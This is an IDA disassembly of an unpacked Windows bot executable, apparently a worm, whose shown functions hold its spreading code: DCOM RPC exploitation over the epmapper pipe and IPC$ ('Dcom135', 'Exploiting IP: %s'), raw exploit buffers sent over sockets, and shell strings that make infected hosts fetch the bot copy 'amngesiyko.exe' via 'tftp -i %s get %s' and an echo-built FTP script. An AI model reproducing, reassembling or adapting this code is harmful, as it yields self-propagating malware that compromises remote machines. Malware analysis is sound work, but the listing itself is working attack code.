;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 7FAFEDADD282CAF345D48733A8DCCCD2
; File Name : u:\work\7fafedadd282caf345d48733a8dcccd2_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00031000 ( 200704.)
; Section size in file : 00031000 ( 200704.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_4013F1+28�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_43454C
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, offset asc_434558 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, byte_4443A4
push 45h
mov [ebp+var_124], al
pop ecx
xor eax, eax
lea edi, [ebp+var_123]
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
push 0FFh
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
xor edi, edi
push edi
push edi
call ds:dword_4942D4
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_416970
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_416970
mov esi, [ebp+arg_4]
add esp, 10h
lea eax, [ebp+var_354]
push edi
push offset dword_4443A8
push offset dword_4443AC
push esi
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+14h], eax
mov [esi+1Ch], edi
call dword_44B760
cmp eax, 5
mov ebx, 4C3h
jz short loc_4010C7
cmp eax, ebx
jnz short loc_4010D1
loc_4010C7: ; CODE XREF: sub_401000+C1�j
push edi
push edi
push edi
push esi
call dword_44B760
loc_4010D1: ; CODE XREF: sub_401000+C5�j
cmp eax, 5
jz short loc_4010DF
cmp eax, ebx
jz short loc_4010DF
push 1
pop eax
jmp short loc_4010E1
; ---------------------------------------------------------------------------
loc_4010DF: ; CODE XREF: sub_401000+D4�j
; sub_401000+D8�j
xor eax, eax
loc_4010E1: ; CODE XREF: sub_401000+DD�j
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010E6 proc near ; CODE XREF: sub_4013F1+7A�p
; sub_4013F1+15A�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push esi
push edi
mov esi, offset off_434560
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_43456C ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
mov ecx, 8Ah
xor eax, eax
lea edi, [ebp+var_34E]
push 45h
rep stosd
stosw
mov al, byte_4443B0
pop ecx
mov [ebp+var_124], al
xor eax, eax
lea edi, [ebp+var_123]
push 0FFh
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
xor esi, esi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push esi
call ds:dword_4942D4
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_416970
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_416970
add esp, 10h
loc_401177: ; CODE XREF: sub_4010E6+AF�j
push esi
lea eax, [ebp+var_354]
push esi
push eax
call dword_44B600
test eax, eax
jz short loc_401197
push 7D0h
call ds:dword_4942D8
jmp short loc_401177
; ---------------------------------------------------------------------------
loc_401197: ; CODE XREF: sub_4010E6+A2�j
push 1
pop eax
pop edi
pop esi
leave
retn
sub_4010E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40119E proc near ; CODE XREF: sub_4013F1+A9�p
; sub_4013F1+1E7�p
var_3004 = byte ptr -3004h
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3004h
call sub_418D40
push esi
push edi
push offset aAmngesiyko_exe ; "amngesiyko.exe"
mov esi, 0A7h
push [ebp+arg_0]
mov [ebp+var_4], esi
call sub_40AFEC
pop ecx
push eax
lea eax, [ebp+var_3004]
push 1000h
push eax
call sub_414773
mov edi, eax
add esp, 10h
test edi, edi
jz loc_4013ED
push ebx
mov ebx, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push 30h
lea eax, [ebp+var_2004]
push ebx
push eax
call sub_418A00
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_4189A0
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+var_1F2D]
push eax
call sub_418A00
add esp, 24h
lea esi, [edi+0D7h]
loc_401223: ; CODE XREF: sub_40119E+D3�j
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jz short loc_401273
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push ebx
push eax
mov [ebp+var_4], esi
call sub_418A00
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_4189A0
lea eax, [ebp+var_3004]
push edi
push eax
lea eax, [ebp+esi+var_1FD4]
push eax
call sub_418A00
add esp, 24h
lea esi, [esi+edi+30h]
jmp short loc_401223
; ---------------------------------------------------------------------------
loc_401273: ; CODE XREF: sub_40119E+90�j
cmp [ebp+arg_C4], 0
jz short loc_40128E
cmp [ebp+arg_C0], 3
jz short loc_401297
cmp [ebp+arg_C0], 0
jmp short loc_401295
; ---------------------------------------------------------------------------
loc_40128E: ; CODE XREF: sub_40119E+DC�j
cmp [ebp+arg_C0], 3
loc_401295: ; CODE XREF: sub_40119E+EE�j
jnz short loc_4012A0
loc_401297: ; CODE XREF: sub_40119E+E5�j
push 4
push offset dword_434548
jmp short loc_4012A7
; ---------------------------------------------------------------------------
loc_4012A0: ; CODE XREF: sub_40119E:loc_401295�j
push 4
push offset dword_434544
loc_4012A7: ; CODE XREF: sub_40119E+100�j
lea eax, [ebp+var_1FE0]
push eax
call sub_418A00
add esp, 0Ch
lea eax, [ebp+var_1004]
push 360h
push offset dword_43407C
push eax
call sub_418A00
push 10h
lea eax, [ebp+var_CA4]
push offset dword_4343E0
push eax
call sub_418A00
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_418A00
lea edi, [esi+370h]
push 3Ch
push offset off_4343F4
lea eax, [ebp+edi+var_1004]
push eax
call sub_418A00
add edi, 3Ch
push 30h
push offset dword_434434
lea eax, [ebp+edi+var_1004]
push eax
call sub_418A00
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_416A10
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_4189A0
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_418A00
mov eax, [ebp+arg_BC]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_4013ED: ; CODE XREF: sub_40119E+3E�j
pop edi
pop esi
leave
retn
sub_40119E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013F1 proc near ; CODE XREF: .text:00401756�p
; sub_403076+1E6�p
; DATA XREF: ...
var_1338 = byte ptr -1338h
var_338 = byte ptr -338h
var_234 = byte ptr -234h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
arg_B4 = dword ptr 0BCh
push ebp
mov ebp, esp
mov eax, 1338h
call sub_418D40
cmp [ebp+arg_A0], 1BDh
push ebx
push esi
push edi
jnz loc_40155F
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_401000
pop ecx
test eax, eax
pop ecx
jz loc_40166F
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_338]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_418D70
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp+var_338]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call ds:dword_4942EC
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_401476
loc_401467: ; CODE XREF: sub_4013F1+126�j
lea eax, [ebp+arg_4]
push eax
call sub_4010E6
pop ecx
jmp loc_40166F
; ---------------------------------------------------------------------------
loc_401476: ; CODE XREF: sub_4013F1+74�j
lea eax, [ebp+arg_4]
push 2
push eax
call sub_4064A6
pop ecx
lea esi, [ebp+arg_0]
pop ecx
push 1
push eax
lea eax, [ebp+var_10]
push eax
sub esp, 0BCh
push 2Fh
loc_401495: ; DATA XREF: .data:off_4354CC�o
; .data:off_435E2C�o
pop ecx
mov edi, esp
rep movsd
call sub_40119E
add esp, 0C8h
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_40150E
mov edi, 186A0h
push edi
call sub_416A10
mov esi, eax
push edi
push ebx
push esi
call sub_4189A0
add esp, 10h
lea eax, [ebp+var_C]
mov edi, 2710h
push ebx
push eax
push edi
push esi
push 48h
push offset dword_434030
push [ebp+var_4]
call ds:dword_4942E8
cmp byte ptr [esi+2], 0Ch
jnz short loc_4014FE
lea eax, [ebp+var_14]
push ebx
push eax
push [ebp+var_10]
push [ebp+var_8]
push [ebp+var_4]
call ds:dword_4942E4
test eax, eax
jnz short loc_40151C
loc_4014FE: ; CODE XREF: sub_4013F1+F3�j
push esi
call sub_417480
push [ebp+var_8]
call sub_417480
pop ecx
pop ecx
loc_40150E: ; CODE XREF: sub_4013F1+B9�j
push [ebp+var_4]
call ds:dword_4942E0
jmp loc_401467
; ---------------------------------------------------------------------------
loc_40151C: ; CODE XREF: sub_4013F1+10B�j
lea eax, [ebp+var_C]
push ebx
push eax
push edi
push esi
push [ebp+var_4]
call ds:dword_4942DC
push [ebp+var_8]
mov edi, eax
call sub_417480
push esi
call sub_417480
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4942E0
lea eax, [ebp+arg_4]
push eax
call sub_4010E6
cmp edi, 1
pop ecx
jnz loc_401683
jmp loc_40166F
; ---------------------------------------------------------------------------
loc_40155F: ; CODE XREF: sub_4013F1+1A�j
lea eax, [ebp+arg_4]
push 1
push eax
call sub_4064A6
mov esi, eax
pop ecx
cmp esi, 1
pop ecx
jz loc_40166F
xor ebx, ebx
push ebx
push 1
push 2
call dword_44B740 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_40166F
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+arg_A0]
call dword_44B6C0 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call dword_44B700 ; inet_addr
mov [ebp+var_20], eax
push ebx
lea eax, [ebp+var_C]
push esi
push eax
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40119E
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_4015F1
push [ebp+var_4]
jmp short loc_401669
; ---------------------------------------------------------------------------
loc_4015F1: ; CODE XREF: sub_4013F1+1F9�j
mov edi, [ebp+var_4]
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401609
loc_401606: ; CODE XREF: sub_4013F1+22A�j
push esi
jmp short loc_401662
; ---------------------------------------------------------------------------
loc_401609: ; CODE XREF: sub_4013F1+213�j
push ebx
push 48h
push offset dword_434030
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401606
mov esi, 1000h
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push ebx
push [ebp+var_C]
push [ebp+var_8]
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40164A
push [ebp+var_8]
jmp short loc_401662
; ---------------------------------------------------------------------------
loc_40164A: ; CODE XREF: sub_4013F1+252�j
push ebx
lea eax, [ebp+var_1338]
push esi
push eax
push edi
call dword_44B6D8 ; recv
push [ebp+var_8]
cmp eax, 0FFFFFFFFh
jnz short loc_401676
loc_401662: ; CODE XREF: sub_4013F1+216�j
; sub_4013F1+257�j
call sub_417480
pop ecx
push edi
loc_401669: ; CODE XREF: sub_4013F1+1FE�j
call dword_44B758 ; closesocket
loc_40166F: ; CODE XREF: sub_4013F1+31�j
; sub_4013F1+80�j ...
xor eax, eax
jmp loc_401732
; ---------------------------------------------------------------------------
loc_401676: ; CODE XREF: sub_4013F1+26F�j
call sub_417480
pop ecx
push edi
call dword_44B758 ; closesocket
loc_401683: ; CODE XREF: sub_4013F1+163�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_234]
push offset aTftpFileTransf ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_418D70
add esp, 0Ch
xor esi, esi
loc_40169D: ; CODE XREF: sub_4013F1+2CC�j
lea eax, [ebp+var_234]
push eax
call sub_40375F
test eax, eax
pop ecx
jnz short loc_4016C1
push 1388h
call ds:dword_4942D8
inc esi
cmp esi, 6
jl short loc_40169D
jmp short loc_40172F
; ---------------------------------------------------------------------------
loc_4016C1: ; CODE XREF: sub_4013F1+2BB�j
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
lea eax, [ebp+var_234]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax
call sub_418D70
add esp, 10h
cmp [ebp+arg_B4], ebx
jnz short loc_40170D
push ebx
lea eax, [ebp+var_234]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_40170D: ; CODE XREF: sub_4013F1+2FD�j
lea eax, [ebp+var_234]
push eax
call sub_4035E1
mov eax, [ebp+arg_A8]
pop ecx
imul eax, 3Ch
inc dword_436160[eax]
lea eax, dword_436160[eax]
loc_40172F: ; CODE XREF: sub_4013F1+2CE�j
push 1
pop eax
loc_401732: ; CODE XREF: sub_4013F1+280�j
pop edi
pop esi
pop ebx
leave
retn
sub_4013F1 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
lea esi, [esp+10h]
sub esp, 0BCh
mov dword ptr [esp+16Ch], 87h
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4013F1
push 2Fh
lea esi, [esp+0D0h]
pop ecx
mov dword ptr [esp+16Ch], 1BDh
mov edi, esp
mov ebx, eax
rep movsd
call sub_401FDA
add esp, 0BCh
test ebx, ebx
jnz short loc_401789
test eax, eax
jz short loc_40178C
loc_401789: ; CODE XREF: .text:00401783�j
push 1
pop eax
loc_40178C: ; CODE XREF: .text:00401787�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 5214h
call sub_418D40
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push 1
push eax
call sub_4064A6
pop ecx
test eax, eax
pop ecx
jz loc_40197B
cmp eax, 1
jz loc_40197B
push 0
push 1
push 2
call dword_44B740 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_40197B
push 10h
lea eax, [ebp-14h]
push 0
push eax
call sub_4189A0
add esp, 0Ch
mov word ptr [ebp-14h], 2
push dword ptr [ebp+0A8h]
call dword_44B6C0 ; htons
mov [ebp-12h], ax
lea eax, [ebp+0Ch]
push eax
call dword_44B700 ; inet_addr
push offset aAmngesiyko_exe ; "amngesiyko.exe"
mov [ebp-10h], eax
push dword ptr [ebp+8]
call sub_40AFEC
pop ecx
mov esi, 1000h
push eax
lea eax, [ebp-5214h]
push esi
push eax
call sub_414773
add esp, 10h
mov [ebp-4], eax
test eax, eax
jz loc_40197B
push 122h
push offset aS ; "è"
lea eax, [ebp-4214h]
push esi
push eax
call sub_4147FB
mov ebx, eax
push 25Ch
lea eax, [ebp-2214h]
push offset a127_0_0_1Ipc ; "127.0.0.1\\IPC$\\"
push eax
call sub_418A00
lea eax, [ebp-4214h]
push ebx
push eax
lea eax, [ebp-21F0h]
push eax
call sub_418A00
push dword ptr [ebp-4]
lea eax, [ebp-5214h]
push eax
lea eax, [ebp-21F0h]
push eax
call sub_418A00
push 4
lea eax, [ebp-1FE0h]
push offset dword_434D8C
push eax
call sub_418A00
add esp, 40h
lea eax, [ebp-1FDCh]
push 4
push offset dword_434D88
push eax
call sub_418A00
mov eax, 12Eh
add esp, 0Ch
add [ebp-0EB4h], eax
add [ebp-0EACh], eax
mov eax, 250h
push 10h
add [ebp-120Ch], eax
add [ebp-1204h], eax
add [ebp-1194h], eax
add [ebp-1190h], eax
add [ebp-1160h], eax
add [ebp-115Ch], eax
add [ebp-1144h], eax
add [ebp-1088h], eax
lea eax, [ebp-14h]
push eax
push edi
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401917
loc_401914: ; CODE XREF: .text:0040192B�j
; .text:00401944�j ...
push edi
jmp short loc_401975
; ---------------------------------------------------------------------------
loc_401917: ; CODE XREF: .text:00401912�j
xor ebx, ebx
push ebx
push 48h
push offset dword_4346F4
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401914
push ebx
lea eax, [ebp-3214h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
cmp byte ptr [ebp-3212h], 0Ch
jnz short loc_401914
push ebx
lea eax, [ebp-1214h]
push ebx
push eax
push edi
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401914
push ebx
lea eax, [ebp-3214h]
push esi
push eax
push edi
call dword_44B6D8 ; recv
cmp byte ptr [ebp-3212h], 3
push edi
jnz short loc_401982
loc_401975: ; CODE XREF: .text:00401915�j
call dword_44B758 ; closesocket
loc_40197B: ; CODE XREF: .text:004017AF�j
; .text:004017B8�j ...
xor eax, eax
loc_40197D: ; CODE XREF: .text:00401A37�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: .text:00401973�j
call dword_44B758 ; closesocket
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-214h]
push offset aTftpFileTran_0 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_418D70
add esp, 0Ch
xor esi, esi
loc_4019A2: ; CODE XREF: .text:004019C2�j
lea eax, [ebp-214h]
push eax
call sub_40375F
test eax, eax
pop ecx
jnz short loc_4019C6
push 1388h
call ds:dword_4942D8
inc esi
cmp esi, 6
jl short loc_4019A2
jmp short loc_401A34
; ---------------------------------------------------------------------------
loc_4019C6: ; CODE XREF: .text:004019B1�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
lea eax, [ebp-214h]
push offset aSExploitingI_0 ; "[%s]: Exploiting IP: %s."
push eax
call sub_418D70
add esp, 10h
cmp [ebp+0BCh], ebx
jnz short loc_401A12
push ebx
lea eax, [ebp-214h]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40842D
add esp, 14h
loc_401A12: ; CODE XREF: .text:004019F3�j
lea eax, [ebp-214h]
push eax
call sub_4035E1
mov eax, [ebp+0B0h]
pop ecx
imul eax, 3Ch
inc dword_436160[eax]
lea eax, dword_436160[eax]
loc_401A34: ; CODE XREF: .text:004019C4�j
push 1
pop eax
jmp loc_40197D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A3C proc near ; CODE XREF: sub_401B9B+42A�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call dword_44B700 ; inet_addr
mov [ebp+var_C], eax
mov ax, word_4356C8
push eax
call dword_44B6C0 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_44B740 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_401B74
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jz loc_401B74
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_44B6D8 ; recv
mov edi, offset aAmngesiyko_exe ; "amngesiyko.exe"
push edi
push edi
push [ebp+arg_0]
call sub_40AFEC
pop ecx
mov esi, 190h
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_418EF0
add esp, 18h
push dword_44B154
push [ebp+arg_0]
call sub_40AFEC
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_418EF0
add esp, 14h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz short loc_401B74
push 1F4h
call ds:dword_4942D8
push edi
push offset aS_0 ; "%s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_418EF0
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401B78
loc_401B74: ; CODE XREF: sub_401A3C+51�j
; sub_401A3C+67�j ...
xor al, al
jmp short loc_401B96
; ---------------------------------------------------------------------------
loc_401B78: ; CODE XREF: sub_401A3C+136�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_44B6D8 ; recv
push ebx
call dword_44B758 ; closesocket
mov al, 1
loc_401B96: ; CODE XREF: sub_401A3C+13A�j
pop edi
pop esi
pop ebx
leave
retn
sub_401A3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B9B proc near ; CODE XREF: sub_401FDA+116�p
; sub_401FDA+138�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_418D40
mov eax, dword_43584C
push ebx
mov [ebp+var_10], eax
mov eax, dword_435850
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_418D70
add esp, 0Ch
xor ebx, ebx
xor esi, esi
lea eax, [ebp+var_103]
loc_401BDA: ; CODE XREF: sub_401B9B+4E�j
mov cl, [ebp+esi+var_3C]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, 28h
jl short loc_401BDA
push 60h
lea eax, [ebp+var_B4]
push offset dword_4352D8
push eax
call sub_418A00
lea eax, [ebp+var_3C]
push eax
call sub_418E70
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_418A00
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC_2+3)
push eax
call sub_418E70
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_418A00
lea eax, [ebp+var_3C]
push eax
call sub_418E70
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_418A00
lea eax, [ebp+var_3C]
push eax
call sub_418E70
shl al, 1
add al, 9
push 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_418A00
mov ax, word_4356C8
add esp, 2Ch
push eax
call dword_44B6C0 ; htons
xor eax, 9999h
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_434FD8
call sub_418A00
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_401D97
mov edi, 0DACh
lea eax, [ebp+var_1CC4]
push edi
push 90h
push eax
call sub_4189A0
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea eax, dword_435708[eax]
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_14E0]
push eax
call sub_418A00
mov esi, offset dword_434F28
push esi
call sub_418E70
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_418A00
push 4
lea eax, [ebp+var_11AC]
push offset dword_435860
push eax
call sub_418A00
push 4
lea eax, [ebp+var_11A8]
push [ebp+var_14]
push eax
call sub_418A00
add esp, 40h
push esi
call sub_418E70
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_418A00
add esp, 10h
xor esi, esi
lea eax, [ebp+var_4803]
loc_401D50: ; CODE XREF: sub_401B9B+1C6�j
mov cl, [ebp+esi+var_1CC4]
inc esi
mov [eax-1], cl
mov [eax], bl
inc eax
inc eax
cmp esi, edi
jl short loc_401D50
mov esi, 1C52h
lea eax, [ebp+var_89B4]
push esi
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_4189A0
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_4189A0
add esp, 18h
